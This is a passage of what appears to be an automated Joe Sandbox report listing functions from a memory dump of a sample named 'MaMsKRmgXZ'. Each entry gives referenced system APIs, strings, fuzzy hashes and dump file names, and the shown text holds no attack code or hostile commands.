Opcode Fuzzy Hash: 86f2c8b4c45ee47cda23bb0f48dce994ce3cf82625c03ca6216eff853c70cfd5
Instruction Fuzzy Hash: D731B039701F02EFE7869FA4C980A9AFBAAFF48794F404155E90167A50DB70E861CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 34269567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 34269598
RtlDebugPrintTimes.NTDLL ref: 342695D6

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: df5ba2de8c7552895c6724fde2dec80deece04071eb7e235ccf280d5a3b66216
Instruction ID: 9293f61813eae2dc5b04d51ed5862f89d6e05cd83d4446a4041f79f39274b334
Opcode Fuzzy Hash: df5ba2de8c7552895c6724fde2dec80deece04071eb7e235ccf280d5a3b66216
Instruction Fuzzy Hash: 8B11C871F14656AFEB058B5DC988B5EFAAEEB883A4F110169E406F3300DEB49D41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 3426174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON

Download Yara Rule

Strings

@, xrefs: 34261877
AddD, xrefs: 342618CD

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @$AddD
API String ID: 0-2525844869
Opcode ID: 910e8c524f5031079560cd247d7e2f8e2f543aadfc4521643dc1d1acc0977c9d
Instruction ID: 89795887ea5d4ef6422ca219d93b11c044d5e43181497ee620f405addb3f536f
Opcode Fuzzy Hash: 910e8c524f5031079560cd247d7e2f8e2f543aadfc4521643dc1d1acc0977c9d
Instruction Fuzzy Hash: F5A1ACB6504344AFE315CF10C844BABB7E9FF84708F504B2EF98596294E7B4E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 342BB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

RedirectedKey, xrefs: 342BB60E
\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 342BB5C4

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
API String ID: 0-1388552009
Opcode ID: 37249e58cc090e585b733a6415f97235f2b6519ef46aab00f1cc77cf0dbfbffb
Instruction ID: 6b9813b4d9797da4b61005d19d997a3dbfe32791d12c577b6d652b2a477c322f
Opcode Fuzzy Hash: 37249e58cc090e585b733a6415f97235f2b6519ef46aab00f1cc77cf0dbfbffb
Instruction Fuzzy Hash: 9561F0B6C00619ABDF11CF95C988ADEBFB9FB08740F50406AE815B7250DB748A46DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 341FF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON

Download Yara Rule

Strings

$, xrefs: 341FF780
$, xrefs: 341FF716

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: ca4da6ee75fc5eb0ae64cf8882c4b4b36dbc1bef605ee3ccdb3885aff4d5199c
Instruction ID: 8229eaae83e4766fb129ecc5aedd4cc27d02029e4f7d726bf9db71a8dcd98275
Opcode Fuzzy Hash: ca4da6ee75fc5eb0ae64cf8882c4b4b36dbc1bef605ee3ccdb3885aff4d5199c
Instruction Fuzzy Hash: AF61C0B5A00F49CFEB20CF64C9C4B9DB7B2FF44704F40426AD5156B690CBB6A982CB90

Uniqueness

Uniqueness Score: -1.00%

Function 341EA1E3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 341EA21B
RtlpResUltimateFallbackInfo Exit, xrefs: 341EA229

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 5fae79da7accc33bacd180ca0cc196ad0af82eea96633a0a610e7196c4a97b1e
Instruction ID: d99e7cc513ebe4d67a3d4424309eafbbd32c88c41248450c3db457f2da6aaa86
Opcode Fuzzy Hash: 5fae79da7accc33bacd180ca0cc196ad0af82eea96633a0a610e7196c4a97b1e
Instruction Fuzzy Hash: CC418E79700F46DBEB09CF9AD880B6A77B4EF45784F2140A9E804EB391E736D981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 3427314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Exit, xrefs: 3427318E
LdrResGetRCConfig Enter, xrefs: 3427317C

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 5b17bc7c6c339d61657d4f42e75675a294091c13b3962d107eee4e65c5146a73
Instruction ID: 694fa38ec823191b86900bcc63160fc066b9f4586a8f6cd1d65ef15bd5a83239
Opcode Fuzzy Hash: 5b17bc7c6c339d61657d4f42e75675a294091c13b3962d107eee4e65c5146a73
Instruction Fuzzy Hash: EE31FE75218782DFE301CB68D880F1ABBE8EF85754F01086EF9549B382EB71D905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 342131BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

.Local\, xrefs: 342131D5
@, xrefs: 3421322D

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 11c5f5eb3f0cda592f187de4163975712cfa87d77ef8f92dc7765fadb2221079
Instruction ID: 214ee73dc27fa7d876ca3d3ce0e65d014a70497fb7cbd09e23c996065044f88b
Opcode Fuzzy Hash: 11c5f5eb3f0cda592f187de4163975712cfa87d77ef8f92dc7765fadb2221079
Instruction Fuzzy Hash: 783190B1508705EFE350DF28C880E5BBBEAEB85694F40092EF994A3250DA35DD09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 3421A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 3421A509
Cleanup Group, xrefs: 3421A504

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: e6623b7d17381b2ca5587108ee7db649830da4cdeee9f4f9d7137957d45b86f3
Instruction ID: 9fae2f22c3318fb12dad8473aa8ca8866d59d139de5818da4e45cfaba58291f4
Opcode Fuzzy Hash: e6623b7d17381b2ca5587108ee7db649830da4cdeee9f4f9d7137957d45b86f3
Instruction Fuzzy Hash: 260121B2918700AFE311DF18CD05B1277E8E740719F018939E65DE79A0E734E900CB85

Uniqueness

Uniqueness Score: -1.00%

Function 341EC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 341EC7E3, 341EC960

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 56e7a33e9c167fedbb5946b1d4902bb582d29940c00ab937ae12654820b64d1d
Instruction ID: de56349348d2076b5ddb459f479536c4ced599fc599b9bbe01c7e80eb4e900f4
Opcode Fuzzy Hash: 56e7a33e9c167fedbb5946b1d4902bb582d29940c00ab937ae12654820b64d1d
Instruction Fuzzy Hash: 0C825F79E00B198FEB14CFA9C9807EDB7B5FF48750F1481A9D859AB250EB349981CF50

Uniqueness

Uniqueness Score: -1.00%

Function 341E64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 981330afdcd9a9907a9edacbecc911f8448cd49c862e3fd064e0847ff6f2bfcd
Instruction ID: 89058ec4fa19d2ca30f88e96dd532958a29370717404d751e82350c547331970
Opcode Fuzzy Hash: 981330afdcd9a9907a9edacbecc911f8448cd49c862e3fd064e0847ff6f2bfcd
Instruction Fuzzy Hash: B2E19078618B41CFD304CF28C4D0A2ABBE1FF88354F858A6DE58597361DB31E986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3420B1E0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON

Download Yara Rule

Strings

@[-4@[-4, xrefs: 3420B1FC

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: @[-4@[-4
API String ID: 0-2023595857
Opcode ID: 50a76976aaf54cd3c905ae6f2afc1ff0b67caf6e443ef9cff70ef1a23743367d
Instruction ID: cfaa152862190b6a0f7d7f7e024923b5bde977337e81f4863afe25db8b40d50d
Opcode Fuzzy Hash: 50a76976aaf54cd3c905ae6f2afc1ff0b67caf6e443ef9cff70ef1a23743367d
Instruction Fuzzy Hash: 94327EB5E10219DFDB24CFA8C894BAEBBB6FF44748F144169E805BB390E7359941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3420E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 587b3b1033d37270f22b5025d171e326b17788cf1efa127e41331dff1e4a7d82
Instruction ID: 3a359cb77d7b3bdfa8c7bdb697f58b7fa3a72a658cf1868574c40f15c7a4ed27
Opcode Fuzzy Hash: 587b3b1033d37270f22b5025d171e326b17788cf1efa127e41331dff1e4a7d82
Instruction Fuzzy Hash: F0A1E271E0075AEFFB11CBA4C844BAEBBE5EF44754F024265E910BB2D0DB749984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 341E754C Relevance: 1.8, APIs: 1, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 644d81b6498ed0c98609880aff0aa4a21f3c1affa06495978397a6c989d17255
Instruction ID: bf04f53d05f601298fb99ff066cfb60370f027f7c59bdc4c44075d9b20ba4341
Opcode Fuzzy Hash: 644d81b6498ed0c98609880aff0aa4a21f3c1affa06495978397a6c989d17255
Instruction Fuzzy Hash: E1B1337AA00A02DFF708CF69D484A69FBF5FF49344F2585AED4299B351D730A981CB90

Uniqueness

Uniqueness Score: -1.00%

Function 341E1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E1153

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ee8f8497196ab5e1982382c388853c2a105277a7de44890755d8479177d167f3
Instruction ID: 213c0daeecf1c82c814244bf32a03e59bb7eeacd262dce00f944bd2e8666e0d8
Opcode Fuzzy Hash: ee8f8497196ab5e1982382c388853c2a105277a7de44890755d8479177d167f3
Instruction Fuzzy Hash: 55B111B5A097818FD354CF28C480A6AFBF1BB88304F15496EF899D7352D771E885CB42

Uniqueness

Uniqueness Score: -1.00%

Function 342655E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80a36826df134ba40c83373fd672d5122b6b7f2fe30b5cadd2570b3b4ac8fa1e
Instruction ID: ec2e3f2be51051f1b7b7e110c6dfd3536017f67e29c5f15c0287817b631c0ccb
Opcode Fuzzy Hash: 80a36826df134ba40c83373fd672d5122b6b7f2fe30b5cadd2570b3b4ac8fa1e
Instruction Fuzzy Hash: 70815E75A00309BEEB61DBA5CC81E9FBBBCEF44754F100629E516B7190D6B4E980CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 341E254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E2630

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: fb90b6cbc721aba61816c6194c28306994e1756c905713ff4de5134a92e072e8
Instruction ID: 7ae674be719e504622c9d5e65065b2d7d52b16c863088a45d34579af882de339
Opcode Fuzzy Hash: fb90b6cbc721aba61816c6194c28306994e1756c905713ff4de5134a92e072e8
Instruction Fuzzy Hash: 3841A1B8901F04CFE715DF24D9A06A9F7F6FF49354F1186AAD416AB2A0DB30A981CF41

Uniqueness

Uniqueness Score: -1.00%

Function 34260443 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 342604BC

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: bf461a1f75d223afe42a77038bbc2bdafbfbd9e4a9fa4a937a0211d849e360d7
Instruction ID: 0a9593befcf5fc2dfaa557a85c37b3f439799e10ab0593ab70530e939b07ebdb
Opcode Fuzzy Hash: bf461a1f75d223afe42a77038bbc2bdafbfbd9e4a9fa4a937a0211d849e360d7
Instruction Fuzzy Hash: 344180719043019FE360DF28C844B9BBBE8FF88354F008A2AF999E7291D7749945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 341E4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E4817

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 057f060abc0adb92912d2913de794d52841b358c7d329ffaf7e1681027b350cd
Instruction ID: 711483238016c4420c176e1f0407c6ab9ed3cfe27947e900226917b53a6864b7
Opcode Fuzzy Hash: 057f060abc0adb92912d2913de794d52841b358c7d329ffaf7e1681027b350cd
Instruction Fuzzy Hash: B641CD78A40F418FE314CF68C8D4F3ABBEAEB81790F41456DE5419B2A0DB31D882DA91

Uniqueness

Uniqueness Score: -1.00%

Function 3427C7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON

Download Yara Rule

Strings

w, xrefs: 3427CBC8

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 790636ca18cb21e5e1f4cc79c4b8efaa762ae8755ba468e1dda80f1ca05c374c
Instruction ID: 741e4d197135b8bf8a111b534cfdc3d276e7ef843f19ac2e166fd79a07873734
Opcode Fuzzy Hash: 790636ca18cb21e5e1f4cc79c4b8efaa762ae8755ba468e1dda80f1ca05c374c
Instruction Fuzzy Hash: CCD1CF74900216EFEB14CF66C481ABFBBB6FF44704F10845EE899AB242E735E981C790

Uniqueness

Uniqueness Score: -1.00%

Function 341DB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341DB4AC

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0d2291f7c4487c35aa9401b53fe24a30782abd4ddf82eacdba450cde82e83f40
Instruction ID: 5d2622595fe43c9e4baa278f9d82998b05c994879a139027bbec345f56d502da
Opcode Fuzzy Hash: 0d2291f7c4487c35aa9401b53fe24a30782abd4ddf82eacdba450cde82e83f40
Instruction Fuzzy Hash: 8E3124B2600A04DFD711CF18C8C0A6B77A9EF46760F1142ADEE169B291CB32ED42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 341E56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E5762

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 650565e5e3c623a0a34160ec9b85d7f5862b754f17423682e8d1459d1f7209be
Instruction ID: 3731195422029992f5ca6967a32284c2dd2a45f0f306cf59e940964e44e0a097
Opcode Fuzzy Hash: 650565e5e3c623a0a34160ec9b85d7f5862b754f17423682e8d1459d1f7209be
Instruction Fuzzy Hash: 1B31B039B15E06FFE7858B64CE80A59BBA6FF84740F805055E80197B50DB31E871CF80

Uniqueness

Uniqueness Score: -1.00%

Function 3428E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3428E7B1

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 06a5fc532fbd7c4f46eb3fc1c2e662259c99d53e3e53129bdac363cbda628dcc
Instruction ID: 833744cf28aad1175bc4638bae3d0f6cc82cd7e75b8b0aeeb36c4092062259b9
Opcode Fuzzy Hash: 06a5fc532fbd7c4f46eb3fc1c2e662259c99d53e3e53129bdac363cbda628dcc
Instruction Fuzzy Hash: AF316AB59083068FD700DF19C44094ABBE6FF8A258F4486AEE498AB261D331E905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 341E3536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 341E35C1

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f35c74f048b45069a46ec492d6ad7a74f053149b26fa96c9b4643b8408f9794f
Instruction ID: 407aa09d7933efad70fafcf64793a5a204b810e5ea28d9409134504442ba248a
Opcode Fuzzy Hash: f35c74f048b45069a46ec492d6ad7a74f053149b26fa96c9b4643b8408f9794f
Instruction Fuzzy Hash: 8F212239601F08DFE321AF14C9C4B2ABBA6EF85B10F422599E8451B350C772ED89CF81

Uniqueness

Uniqueness Score: -1.00%

Function 3426A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3426A19A

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2be385a628cb63047a5bdb82bc51c408e7c040e47a09bae6ce0deb91526f24db
Instruction ID: fdc3cccb66b54f2fcb7712a8e3cb914c2395125c5082d14567880ec95ed8c9e2
Opcode Fuzzy Hash: 2be385a628cb63047a5bdb82bc51c408e7c040e47a09bae6ce0deb91526f24db
Instruction Fuzzy Hash: 92019A36611219AFDF028F84DC40ECA3F66FB4C754F068141FE2966220C676D9B1EF90

Uniqueness

Uniqueness Score: -1.00%

Function 34269603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.9970465329.00000000342DD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_341b0000_MaMsKRmgXZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007fdfb0a2bed9878274a251ecdf9bffc497d2d3b6fa4f5bd7076a89044ba4f5
Instruction ID: 52985fe297e183a807158f1f01c849dbed38f3c20bcf70d24e398f264a30f2aa
Opcode Fuzzy Hash: 007fdfb0a2bed9878274a251ecdf9bffc497d2d3b6fa4f5bd7076a89044ba4f5
Instruction Fuzzy Hash: 2FE06D72B14208ABEB04DB59D845F8A77ECEB8979CF1400A9F50BE7180DAA4DE41DA90

Uniqueness

Uniqueness Score: -1.00%

Function 342660A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 34266241

Memory Dump Source

Source File: 00000002.00000002.9970465329.00000000341B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 341B0000, based on PE: true

Associated: 00000002.00000002.9970465329.00000000342D9000.00000040.00001000.00020000.00000000.sdmpDownload File
